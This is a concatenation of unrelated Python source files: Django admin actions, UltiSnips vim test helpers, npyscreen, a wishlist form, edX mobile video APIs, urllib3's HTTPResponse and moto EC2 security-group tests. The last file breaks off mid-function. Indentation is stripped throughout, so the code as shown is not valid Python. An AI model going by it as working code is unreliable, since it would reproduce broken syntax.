objects_name = force_unicode(opts.verbose_name)
else:
objects_name = force_unicode(opts.verbose_name_plural)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": objects_name}
else:
title = _("Are you sure?")
context = {
"title": title,
"objects_name": objects_name,
"deletable_objects": [deletable_objects],
'queryset': queryset,
"perms_lacking": perms_needed,
"protected": protected,
"opts": opts,
"root_path": modeladmin.admin_site.root_path,
"app_label": app_label,
'action_checkbox_name': helpers.ACTION_CHECKBOX_NAME,
}
# Display the confirmation page
return render_to_response(modeladmin.delete_selected_confirmation_template or [
"admin/%s/%s/delete_selected_confirmation.html" % (app_label, opts.object_name.lower()),
"admin/%s/delete_selected_confirmation.html" % app_label,
"admin/delete_selected_confirmation.html"
], context, context_instance=template.RequestContext(request))
delete_selected.short_description = ugettext_lazy("Delete selected %(verbose_name_plural)s")
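
# --- Illustrative usage sketch (not part of the original module) ---
# A custom admin action follows the same (modeladmin, request, queryset)
# signature as delete_selected above; the model field name is hypothetical.
def make_published(modeladmin, request, queryset):
    queryset.update(status='published')
make_published.short_description = ugettext_lazy("Mark selected %(verbose_name_plural)s as published")
# It would then be enabled on a ModelAdmin via:  actions = [make_published]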
|
krisdages/ultisnips
|
refs/heads/master
|
test/vim_interface.py
|
13
|
# encoding: utf-8
import os
import re
import shutil
import subprocess
import tempfile
import textwrap
import time
from test.constant import (ARR_D, ARR_L, ARR_R, ARR_U, BS, ESC, PYTHON3,
SEQUENCES)
def wait_until_file_exists(file_path, times=None, interval=0.01):
while times is None or times:
if os.path.exists(file_path):
return True
time.sleep(interval)
if times is not None:
times -= 1
return False
def read_text_file(filename):
"""Reads the contens of a text file."""
if PYTHON3:
return open(filename, 'r', encoding='utf-8').read()
else:
return open(filename, 'r').read()
def is_process_running(pid):
"""Returns true if a process with pid is running, false otherwise."""
# from
# http://stackoverflow.com/questions/568271/how-to-check-if-there-exists-a-process-with-a-given-pid
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def silent_call(cmd):
"""Calls 'cmd' and returns the exit value."""
return subprocess.call(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
def create_directory(dirname):
"""Creates 'dirname' and its parents if it does not exist."""
try:
os.makedirs(dirname)
except OSError:
pass
class TempFileManager(object):
def __init__(self, name=''):
self._temp_dir = tempfile.mkdtemp(prefix='UltiSnipsTest_' + name)
def name_temp(self, file_path):
return os.path.join(self._temp_dir, file_path)
def write_temp(self, file_path, content):
abs_path = self.name_temp(file_path)
create_directory(os.path.dirname(abs_path))
if PYTHON3:
with open(abs_path, 'w', encoding='utf-8') as f:
f.write(content)
else:
with open(abs_path, 'w') as f:
f.write(content)
return abs_path
def unique_name_temp(self, suffix='', prefix=''):
file_handler, abspath = tempfile.mkstemp(
suffix, prefix, self._temp_dir)
os.close(file_handler)
os.remove(abspath)
return abspath
def clear_temp(self):
shutil.rmtree(self._temp_dir)
create_directory(self._temp_dir)
class VimInterface(TempFileManager):
def __init__(self, vim_executable, name):
TempFileManager.__init__(self, name)
self._vim_executable = vim_executable
def get_buffer_data(self):
buffer_path = self.unique_name_temp(prefix='buffer_')
self.send_to_vim(ESC + ':w! %s\n' % buffer_path)
if wait_until_file_exists(buffer_path, 50):
return read_text_file(buffer_path)[:-1]
def send_to_terminal(self, s):
"""Types 's' into the terminal."""
raise NotImplementedError()
def send_to_vim(self, s):
"""Types 's' into the vim instance under test."""
raise NotImplementedError()
def launch(self, config=[]):
"""Returns the python version in Vim as a string, e.g. '2.7'"""
pid_file = self.name_temp('vim.pid')
done_file = self.name_temp('loading_done')
if os.path.exists(done_file):
os.remove(done_file)
post_config = []
post_config.append('%s << EOF' % ('py3' if PYTHON3 else 'py'))
post_config.append('import vim, sys')
post_config.append(
"with open('%s', 'w') as pid_file: pid_file.write(vim.eval('getpid()'))" %
pid_file)
post_config.append("with open('%s', 'w') as done_file:" % done_file)
post_config.append(" done_file.write('%i.%i.%i' % sys.version_info[:3])")
post_config.append('EOF')
config_path = self.write_temp('vim_config.vim',
textwrap.dedent(os.linesep.join(config + post_config) + '\n'))
# Note the space to exclude it from shell history. Also we always set
# NVIM_LISTEN_ADDRESS, even when running vanilla Vim, because it will
# just not care.
self.send_to_terminal(""" NVIM_LISTEN_ADDRESS=/tmp/nvim %s -u %s\r\n""" % (
self._vim_executable, config_path))
wait_until_file_exists(done_file)
self._vim_pid = int(read_text_file(pid_file))
return read_text_file(done_file).strip()
def leave_with_wait(self):
self.send_to_vim(3 * ESC + ':qa!\n')
while is_process_running(self._vim_pid):
time.sleep(.2)
class VimInterfaceTmux(VimInterface):
def __init__(self, vim_executable, session):
VimInterface.__init__(self, vim_executable, 'Tmux')
self.session = session
self._check_version()
def _send(self, s):
# I did not find any documentation on what needs escaping when sending
# to tmux, but it seems like this is all that is needed for now.
s = s.replace(';', r'\;')
if PYTHON3:
s = s.encode('utf-8')
silent_call(['tmux', 'send-keys', '-t', self.session, '-l', s])
def send_to_terminal(self, s):
return self._send(s)
def send_to_vim(self, s):
return self._send(s)
def _check_version(self):
stdout, _ = subprocess.Popen(['tmux', '-V'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
if PYTHON3:
stdout = stdout.decode('utf-8')
m = re.match(r"tmux (\d+).(\d+)", stdout)
if not m or not (int(m.group(1)), int(m.group(2))) >= (1, 8):
raise RuntimeError(
'Need at least tmux 1.8, you have %s.' %
stdout.strip())
class VimInterfaceTmuxNeovim(VimInterfaceTmux):
def __init__(self, vim_executable, session):
VimInterfaceTmux.__init__(self, vim_executable, session)
self._nvim = None
def send_to_vim(self, s):
if s == ARR_L:
s = "<Left>"
elif s == ARR_R:
s = "<Right>"
elif s == ARR_U:
s = "<Up>"
elif s == ARR_D:
s = "<Down>"
elif s == BS:
s = "<bs>"
elif s == ESC:
s = "<esc>"
elif s == "<":
s = "<lt>"
self._nvim.input(s)
def launch(self, config=[]):
import neovim
rv = VimInterfaceTmux.launch(self, config)
self._nvim = neovim.attach('socket', path='/tmp/nvim')
return rv
class VimInterfaceWindows(VimInterface):
BRACES = re.compile('([}{])')
WIN_ESCAPES = ['+', '^', '%', '~', '[', ']', '<', '>', '(', ')']
WIN_REPLACES = [
(BS, '{BS}'),
(ARR_L, '{LEFT}'),
(ARR_R, '{RIGHT}'),
(ARR_U, '{UP}'),
(ARR_D, '{DOWN}'),
('\t', '{TAB}'),
('\n', '~'),
(ESC, '{ESC}'),
# On my system ` waits for a second keystroke, so `+SPACE = "`". On
# most systems, `+Space = "` ". I work around this, by sending the host
# ` as `+_+BS. Awkward, but the only way I found to get this working.
('`', '`_{BS}'),
('´', '´_{BS}'),
('{^}', '{^}_{BS}'),
]
def __init__(self):
# import windows specific modules
import win32com.client
import win32gui
self.win32gui = win32gui
self.shell = win32com.client.Dispatch('WScript.Shell')
def is_focused(self, title=None):
cur_title = self.win32gui.GetWindowText(
self.win32gui.GetForegroundWindow())
if (title or '- GVIM') in cur_title:
return True
return False
def focus(self, title=None):
if not self.shell.AppActivate(title or '- GVIM'):
raise Exception('Failed to switch to GVim window')
time.sleep(1)
def convert_keys(self, keys):
keys = self.BRACES.sub(r"{\1}", keys)
for k in self.WIN_ESCAPES:
keys = keys.replace(k, '{%s}' % k)
for f, r in self.WIN_REPLACES:
keys = keys.replace(f, r)
return keys
def send(self, keys):
keys = self.convert_keys(keys)
if not self.is_focused():
time.sleep(2)
self.focus()
if not self.is_focused():
# This is the only way I can find to stop test execution
raise KeyboardInterrupt('Failed to focus GVIM')
self.shell.SendKeys(keys)
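
# --- Illustrative usage sketch (not part of the original module) ---
# Rough driver code for the tmux-based interface above; it assumes tmux and a
# vim binary are installed and that a tmux session named 'vim_test' already
# exists. Both names are placeholders.
def _example_session():
    vim = VimInterfaceTmux('vim', 'vim_test')
    python_version = vim.launch(config=['set noswapfile'])
    vim.send_to_vim('iHello' + ESC)
    buffer_text = vim.get_buffer_data()
    vim.leave_with_wait()
    return python_version, buffer_text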
|
C-Blu/npyscreen
|
refs/heads/master
|
build/lib/npyscreen/wgmultiselecttree.py
|
15
|
from . import wgmultilinetree as multilinetree
from . import wgcheckbox as checkbox
import curses.ascii
import weakref
class MultiSelectTree(multilinetree.SelectOneTree):
_contained_widgets = checkbox.Checkbox
def set_up_handlers(self):
super(MultiSelectTree, self).set_up_handlers()
self.handlers.update({
ord("x"): self.h_select_toggle,
curses.ascii.SP: self.h_select_toggle,
ord("X"): self.h_select,
"^U": self.h_select_none,
})
def h_select_none(self, input):
self.value = []
def h_select_toggle(self, input):
try:
working_with = weakref.proxy(self.values[self.cursor_line])
except TypeError:
working_with = self.values[self.cursor_line]
if working_with in self.value:
self.value.remove(working_with)
else:
self.value.append(working_with)
def h_set_filtered_to_selected(self, ch):
self.value = self.get_filtered_values()
def h_select_exit(self, ch):
try:
working_with = weakref.proxy(self.values[self.cursor_line])
except TypeError:
working_with = self.values[self.cursor_line]
if not working_with in self.value:
self.value.append(working_with)
if self.return_exit:
self.editing = False
self.how_exited=True
|
kimond/gobgift
|
refs/heads/master
|
gobgift/wishlists/forms.py
|
1
|
from dal import autocomplete
from django import forms
from gobgift.core.forms import CharField
from gobgift.groups.models import ListGroup
from .models import Wishlist
class WishlistForm(autocomplete.FutureModelForm):
name = CharField()
groups = forms.ModelMultipleChoiceField(
queryset=ListGroup.objects.all(),
required=False,
widget=autocomplete.ModelSelect2Multiple(
url='listgroup-autocomplete',
attrs={
'data-placeholder': 'Groups',
}
)
)
class Meta:
model = Wishlist
fields = ['owner', 'name', 'groups']
def __init__(self, user=None, *args, **kwargs):
super(WishlistForm, self).__init__(*args, **kwargs)
self.user = user
self.fields['owner'].required = False
self.fields['owner'].widget = forms.HiddenInput()
def clean(self):
cleaned_data = super(WishlistForm, self).clean()
cleaned_data['owner'] = self.user
return cleaned_data
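
# --- Illustrative usage sketch (not part of the original module) ---
# The form takes the requesting user as its first argument so that clean() can
# force ownership; `request` below stands in for a Django view's request object.
def _example_create_wishlist(request):
    form = WishlistForm(request.user, data=request.POST)
    if form.is_valid():
        return form.save()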
|
jswope00/griffinx
|
refs/heads/master
|
lms/djangoapps/mobile_api/video_outlines/views.py
|
9
|
"""
Video Outlines
We only provide the listing view for a video outline, and video outlines are
only displayed at the course level. This is because it makes it a lot easier to
optimize and reason about, and it avoids having to tackle the bigger problem of
general XBlock representation in this rather specialized formatting.
"""
from functools import partial
from django.http import Http404, HttpResponse
from rest_framework import generics
from rest_framework.response import Response
from opaque_keys.edx.locator import BlockUsageLocator
from xmodule.exceptions import NotFoundError
from xmodule.modulestore.django import modulestore
from ..utils import mobile_view, mobile_course_access
from .serializers import BlockOutline, video_summary
@mobile_view()
class VideoSummaryList(generics.ListAPIView):
"""
**Use Case**
Get a list of all videos in the specified course. You can use the
video_url value to access the video file.
**Example request**:
GET /api/mobile/v0.5/video_outlines/courses/{organization}/{course_number}/{course_run}
**Response Values**
An array of videos in the course. For each video:
* section_url: The URL to the first page of the section that
contains the video in the Learning Management System.
        * path: An array containing category, name, and id values specifying the
          complete path to the video in the courseware hierarchy. The
          following category values are included: "chapter", "sequential",
          and "vertical". The name value is the display name for that object.
        * unit_url: The URL to the unit that contains the video in the Learning
          Management System.
* named_path: An array consisting of the display names of the
courseware objects in the path to the video.
* summary: An array of data about the video that includes:
* category: The type of component, in this case always "video".
* video_thumbnail_url: The URL to the thumbnail image for the
video, if available.
* language: The language code for the video.
* name: The display name of the video.
* video_url: The URL to the video file. Use this value to access
the video.
* duration: The length of the video, if available.
* transcripts: An array of language codes and URLs to available
video transcripts. Use the URL value to access a transcript
for the video.
* id: The unique identifier for the video.
* size: The size of the video file
"""
@mobile_course_access(depth=None)
def list(self, request, course, *args, **kwargs):
video_outline = list(
BlockOutline(
course.id,
course,
{"video": partial(video_summary, course)},
request,
)
)
return Response(video_outline)
@mobile_view()
class VideoTranscripts(generics.RetrieveAPIView):
"""
**Use Case**
Use to get a transcript for a specified video and language.
**Example request**:
GET /api/mobile/v0.5/video_outlines/transcripts/{organization}/{course_number}/{course_run}/{video ID}/{language code}
**Response Values**
An HttpResponse with an SRT file download.
"""
@mobile_course_access()
def get(self, request, course, *args, **kwargs):
block_id = kwargs['block_id']
lang = kwargs['lang']
usage_key = BlockUsageLocator(
course.id, block_type="video", block_id=block_id
)
try:
video_descriptor = modulestore().get_item(usage_key)
content, filename, mimetype = video_descriptor.get_transcript(lang=lang)
except (NotFoundError, ValueError, KeyError):
raise Http404(u"Transcript not found for {}, lang: {}".format(block_id, lang))
response = HttpResponse(content, content_type=mimetype)
response['Content-Disposition'] = 'attachment; filename="{}"'.format(filename)
return response
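
# --- Illustrative usage sketch (not part of the original module) ---
# Example client call against the endpoint documented above; the host, course id
# parts, and auth token are placeholders, and the `requests` library is assumed:
#
#   import requests
#   resp = requests.get(
#       "https://lms.example.com/api/mobile/v0.5/video_outlines/courses/edX/DemoX/Demo_Course",
#       headers={"Authorization": "Bearer <token>"},
#   )
#   videos = resp.json()  # list of dicts with section_url, path, summary, ...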
|
havard024/prego
|
refs/heads/master
|
crm/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/response.py
|
316
|
# urllib3/response.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import logging
import zlib
import io
from .exceptions import DecodeError
from .packages.six import string_types as basestring, binary_type
from .util import is_fp_closed
log = logging.getLogger(__name__)
class DeflateDecoder(object):
def __init__(self):
self._first_try = True
self._data = binary_type()
self._obj = zlib.decompressobj()
def __getattr__(self, name):
return getattr(self._obj, name)
def decompress(self, data):
if not self._first_try:
return self._obj.decompress(data)
self._data += data
try:
return self._obj.decompress(data)
except zlib.error:
self._first_try = False
self._obj = zlib.decompressobj(-zlib.MAX_WBITS)
try:
return self.decompress(self._data)
finally:
self._data = None
def _get_decoder(mode):
if mode == 'gzip':
return zlib.decompressobj(16 + zlib.MAX_WBITS)
return DeflateDecoder()
class HTTPResponse(io.IOBase):
"""
HTTP Response container.
Backwards-compatible to httplib's HTTPResponse but the response ``body`` is
loaded and decoded on-demand when the ``data`` property is accessed.
Extra parameters for behaviour not present in httplib.HTTPResponse:
:param preload_content:
If True, the response's body will be preloaded during construction.
:param decode_content:
If True, attempts to decode specific content-encoding's based on headers
(like 'gzip' and 'deflate') will be skipped and raw data will be used
instead.
:param original_response:
When this HTTPResponse wrapper is generated from an httplib.HTTPResponse
object, it's convenient to include the original for debug purposes. It's
otherwise unused.
"""
CONTENT_DECODERS = ['gzip', 'deflate']
REDIRECT_STATUSES = [301, 302, 303, 307, 308]
def __init__(self, body='', headers=None, status=0, version=0, reason=None,
strict=0, preload_content=True, decode_content=True,
original_response=None, pool=None, connection=None):
self.headers = headers or {}
self.status = status
self.version = version
self.reason = reason
self.strict = strict
self.decode_content = decode_content
self._decoder = None
self._body = body if body and isinstance(body, basestring) else None
self._fp = None
self._original_response = original_response
self._fp_bytes_read = 0
self._pool = pool
self._connection = connection
if hasattr(body, 'read'):
self._fp = body
if preload_content and not self._body:
self._body = self.read(decode_content=decode_content)
def get_redirect_location(self):
"""
Should we redirect and where to?
:returns: Truthy redirect location string if we got a redirect status
code and valid location. ``None`` if redirect status and no
location. ``False`` if not a redirect status code.
"""
if self.status in self.REDIRECT_STATUSES:
return self.headers.get('location')
return False
def release_conn(self):
if not self._pool or not self._connection:
return
self._pool._put_conn(self._connection)
self._connection = None
@property
def data(self):
        # For backwards-compat with urllib3 0.4 and earlier.
if self._body:
return self._body
if self._fp:
return self.read(cache_content=True)
def tell(self):
"""
Obtain the number of bytes pulled over the wire so far. May differ from
the amount of content returned by :meth:``HTTPResponse.read`` if bytes
are encoded on the wire (e.g, compressed).
"""
return self._fp_bytes_read
def read(self, amt=None, decode_content=None, cache_content=False):
"""
Similar to :meth:`httplib.HTTPResponse.read`, but with two additional
parameters: ``decode_content`` and ``cache_content``.
:param amt:
How much of the content to read. If specified, caching is skipped
because it doesn't make sense to cache partial content as the full
response.
:param decode_content:
If True, will attempt to decode the body based on the
'content-encoding' header.
:param cache_content:
If True, will save the returned data such that the same result is
            returned regardless of the state of the underlying file object. This
is useful if you want the ``.data`` property to continue working
after having ``.read()`` the file object. (Overridden if ``amt`` is
set.)
"""
# Note: content-encoding value should be case-insensitive, per RFC 2616
# Section 3.5
content_encoding = self.headers.get('content-encoding', '').lower()
if self._decoder is None:
if content_encoding in self.CONTENT_DECODERS:
self._decoder = _get_decoder(content_encoding)
if decode_content is None:
decode_content = self.decode_content
if self._fp is None:
return
flush_decoder = False
try:
if amt is None:
# cStringIO doesn't like amt=None
data = self._fp.read()
flush_decoder = True
else:
cache_content = False
data = self._fp.read(amt)
if amt != 0 and not data: # Platform-specific: Buggy versions of Python.
# Close the connection when no data is returned
#
# This is redundant to what httplib/http.client _should_
# already do. However, versions of python released before
# December 15, 2012 (http://bugs.python.org/issue16298) do not
# properly close the connection in all cases. There is no harm
# in redundantly calling close.
self._fp.close()
flush_decoder = True
self._fp_bytes_read += len(data)
try:
if decode_content and self._decoder:
data = self._decoder.decompress(data)
except (IOError, zlib.error) as e:
raise DecodeError(
"Received response with content-encoding: %s, but "
"failed to decode it." % content_encoding,
e)
if flush_decoder and decode_content and self._decoder:
buf = self._decoder.decompress(binary_type())
data += buf + self._decoder.flush()
if cache_content:
self._body = data
return data
finally:
if self._original_response and self._original_response.isclosed():
self.release_conn()
def stream(self, amt=2**16, decode_content=None):
"""
A generator wrapper for the read() method. A call will block until
``amt`` bytes have been read from the connection or until the
connection is closed.
:param amt:
How much of the content to read. The generator will return up to
            this much data per iteration, but may return less. This is particularly
likely when using compressed data. However, the empty string will
never be returned.
:param decode_content:
If True, will attempt to decode the body based on the
'content-encoding' header.
"""
while not is_fp_closed(self._fp):
data = self.read(amt=amt, decode_content=decode_content)
if data:
yield data
@classmethod
def from_httplib(ResponseCls, r, **response_kw):
"""
Given an :class:`httplib.HTTPResponse` instance ``r``, return a
corresponding :class:`urllib3.response.HTTPResponse` object.
Remaining parameters are passed to the HTTPResponse constructor, along
with ``original_response=r``.
"""
# Normalize headers between different versions of Python
headers = {}
for k, v in r.getheaders():
# Python 3: Header keys are returned capitalised
k = k.lower()
has_value = headers.get(k)
if has_value: # Python 3: Repeating header keys are unmerged.
v = ', '.join([has_value, v])
headers[k] = v
# HTTPResponse objects in Python 3 don't have a .strict attribute
strict = getattr(r, 'strict', 0)
return ResponseCls(body=r,
headers=headers,
status=r.status,
version=r.version,
reason=r.reason,
strict=strict,
original_response=r,
**response_kw)
# Backwards-compatibility methods for httplib.HTTPResponse
def getheaders(self):
return self.headers
def getheader(self, name, default=None):
return self.headers.get(name, default)
# Overrides from io.IOBase
def close(self):
if not self.closed:
self._fp.close()
@property
def closed(self):
if self._fp is None:
return True
elif hasattr(self._fp, 'closed'):
return self._fp.closed
elif hasattr(self._fp, 'isclosed'): # Python 2
return self._fp.isclosed()
else:
return True
def fileno(self):
if self._fp is None:
raise IOError("HTTPResponse has no file to get a fileno from")
elif hasattr(self._fp, "fileno"):
return self._fp.fileno()
else:
raise IOError("The file-like object this HTTPResponse is wrapped "
"around has no file descriptor")
def flush(self):
if self._fp is not None and hasattr(self._fp, 'flush'):
return self._fp.flush()
def readable(self):
return True
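# ---------------------------------------------------------------------------
# Editor's illustrative sketch (not part of upstream urllib3): how the class
# above wraps a file-like body and reads it lazily. It assumes only the
# standard library plus the HTTPResponse defined in this module.
def _example_lazy_read():  # pragma: no cover
    body = io.BytesIO(b'hello world')
    # preload_content=False defers reading until .read() / .data is used.
    resp = HTTPResponse(body=body, status=200,
                        headers={'content-type': 'text/plain'},
                        preload_content=False)
    assert resp.read(cache_content=True) == b'hello world'
    assert resp.data == b'hello world'  # served from the cached body
    assert resp.tell() == 11            # bytes pulled over the wire so far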
|
Gadal/sympy
|
refs/heads/master
|
sympy/diffgeom/tests/__init__.py
|
12133432
| |
lz199144/python
|
refs/heads/master
|
neo1218/0023/web/tests/__init__.py
|
12133432
| |
gjtempleton/moto
|
refs/heads/master
|
tests/test_ec2/test_security_groups.py
|
4
|
from __future__ import unicode_literals
import copy
# Ensure 'assert_raises' context manager support for Python 2.6
import tests.backport_assert_raises # noqa
from nose.tools import assert_raises
import boto3
import boto
from botocore.exceptions import ClientError
from boto.exception import EC2ResponseError
import sure # noqa
from moto import mock_ec2, mock_ec2_deprecated
@mock_ec2_deprecated
def test_create_and_describe_security_group():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as ex:
security_group = conn.create_security_group(
'test security group', 'this is a test security group', dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set')
security_group = conn.create_security_group(
'test security group', 'this is a test security group')
security_group.name.should.equal('test security group')
security_group.description.should.equal('this is a test security group')
# Trying to create another group with the same name should throw an error
with assert_raises(EC2ResponseError) as cm:
conn.create_security_group(
'test security group', 'this is a test security group')
cm.exception.code.should.equal('InvalidGroup.Duplicate')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
all_groups = conn.get_all_security_groups()
# The default group gets created automatically
all_groups.should.have.length_of(3)
group_names = [group.name for group in all_groups]
set(group_names).should.equal(set(["default", "test security group"]))
@mock_ec2_deprecated
def test_create_security_group_without_description_raises_error():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as cm:
conn.create_security_group('test security group', '')
cm.exception.code.should.equal('MissingParameter')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_default_security_group():
conn = boto.ec2.connect_to_region('us-east-1')
groups = conn.get_all_security_groups()
groups.should.have.length_of(2)
groups[0].name.should.equal("default")
@mock_ec2_deprecated
def test_create_and_describe_vpc_security_group():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = 'vpc-5300000c'
security_group = conn.create_security_group(
'test security group', 'this is a test security group', vpc_id=vpc_id)
security_group.vpc_id.should.equal(vpc_id)
security_group.name.should.equal('test security group')
security_group.description.should.equal('this is a test security group')
# Trying to create another group with the same name in the same VPC should
# throw an error
with assert_raises(EC2ResponseError) as cm:
conn.create_security_group(
'test security group', 'this is a test security group', vpc_id)
cm.exception.code.should.equal('InvalidGroup.Duplicate')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
all_groups = conn.get_all_security_groups(filters={'vpc_id': [vpc_id]})
all_groups[0].vpc_id.should.equal(vpc_id)
all_groups.should.have.length_of(1)
all_groups[0].name.should.equal('test security group')
@mock_ec2_deprecated
def test_create_two_security_groups_with_same_name_in_different_vpc():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = 'vpc-5300000c'
vpc_id2 = 'vpc-5300000d'
conn.create_security_group(
'test security group', 'this is a test security group', vpc_id)
conn.create_security_group(
'test security group', 'this is a test security group', vpc_id2)
all_groups = conn.get_all_security_groups()
all_groups.should.have.length_of(4)
group_names = [group.name for group in all_groups]
# The default group is created automatically
set(group_names).should.equal(set(["default", "test security group"]))
@mock_ec2_deprecated
def test_deleting_security_groups():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group1 = conn.create_security_group('test1', 'test1')
conn.create_security_group('test2', 'test2')
conn.get_all_security_groups().should.have.length_of(4)
# Deleting a group that doesn't exist should throw an error
with assert_raises(EC2ResponseError) as cm:
conn.delete_security_group('foobar')
cm.exception.code.should.equal('InvalidGroup.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Delete by name
with assert_raises(EC2ResponseError) as ex:
conn.delete_security_group('test2', dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the DeleteSecurityGroup operation: Request would have succeeded, but DryRun flag is set')
conn.delete_security_group('test2')
conn.get_all_security_groups().should.have.length_of(3)
# Delete by group id
conn.delete_security_group(group_id=security_group1.id)
conn.get_all_security_groups().should.have.length_of(2)
@mock_ec2_deprecated
def test_delete_security_group_in_vpc():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = "vpc-12345"
security_group1 = conn.create_security_group('test1', 'test1', vpc_id)
# this should not throw an exception
conn.delete_security_group(group_id=security_group1.id)
@mock_ec2_deprecated
def test_authorize_ip_range_and_revoke():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group = conn.create_security_group('test', 'test')
with assert_raises(EC2ResponseError) as ex:
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the GrantSecurityGroupIngress operation: Request would have succeeded, but DryRun flag is set')
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32")
assert success.should.be.true
security_group = conn.get_all_security_groups(groupnames=['test'])[0]
int(security_group.rules[0].to_port).should.equal(2222)
security_group.rules[0].grants[
0].cidr_ip.should.equal("123.123.123.123/32")
    # A wrong CIDR should throw an error
with assert_raises(EC2ResponseError) as cm:
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", cidr_ip="123.123.123.122/32")
cm.exception.code.should.equal('InvalidPermission.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Actually revoke
with assert_raises(EC2ResponseError) as ex:
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the RevokeSecurityGroupIngress operation: Request would have succeeded, but DryRun flag is set')
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", cidr_ip="123.123.123.123/32")
security_group = conn.get_all_security_groups()[0]
security_group.rules.should.have.length_of(0)
# Test for egress as well
egress_security_group = conn.create_security_group(
'testegress', 'testegress', vpc_id='vpc-3432589')
with assert_raises(EC2ResponseError) as ex:
success = conn.authorize_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the GrantSecurityGroupEgress operation: Request would have succeeded, but DryRun flag is set')
success = conn.authorize_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32")
assert success.should.be.true
egress_security_group = conn.get_all_security_groups(
groupnames='testegress')[0]
# There are two egress rules associated with the security group:
# the default outbound rule and the new one
int(egress_security_group.rules_egress[1].to_port).should.equal(2222)
egress_security_group.rules_egress[1].grants[
0].cidr_ip.should.equal("123.123.123.123/32")
    # A wrong CIDR should throw an error
egress_security_group.revoke.when.called_with(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.122/32").should.throw(EC2ResponseError)
# Actually revoke
with assert_raises(EC2ResponseError) as ex:
conn.revoke_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the RevokeSecurityGroupEgress operation: Request would have succeeded, but DryRun flag is set')
conn.revoke_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32")
egress_security_group = conn.get_all_security_groups()[0]
# There is still the default outbound rule
egress_security_group.rules_egress.should.have.length_of(1)
@mock_ec2_deprecated
def test_authorize_other_group_and_revoke():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group = conn.create_security_group('test', 'test')
other_security_group = conn.create_security_group('other', 'other')
wrong_group = conn.create_security_group('wrong', 'wrong')
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", src_group=other_security_group)
assert success.should.be.true
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test'][0]
int(security_group.rules[0].to_port).should.equal(2222)
security_group.rules[0].grants[
0].group_id.should.equal(other_security_group.id)
# Wrong source group should throw error
with assert_raises(EC2ResponseError) as cm:
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", src_group=wrong_group)
cm.exception.code.should.equal('InvalidPermission.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Actually revoke
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", src_group=other_security_group)
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test'][0]
security_group.rules.should.have.length_of(0)
@mock_ec2
def test_authorize_other_group_egress_and_revoke():
ec2 = boto3.resource('ec2', region_name='us-west-1')
vpc = ec2.create_vpc(CidrBlock='10.0.0.0/16')
sg01 = ec2.create_security_group(
GroupName='sg01', Description='Test security group sg01', VpcId=vpc.id)
sg02 = ec2.create_security_group(
GroupName='sg02', Description='Test security group sg02', VpcId=vpc.id)
ip_permission = {
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'UserIdGroupPairs': [{'GroupId': sg02.id, 'GroupName': 'sg02', 'UserId': sg02.owner_id}],
'IpRanges': []
}
sg01.authorize_egress(IpPermissions=[ip_permission])
sg01.ip_permissions_egress.should.have.length_of(2)
sg01.ip_permissions_egress.should.contain(ip_permission)
sg01.revoke_egress(IpPermissions=[ip_permission])
sg01.ip_permissions_egress.should.have.length_of(1)
@mock_ec2_deprecated
def test_authorize_group_in_vpc():
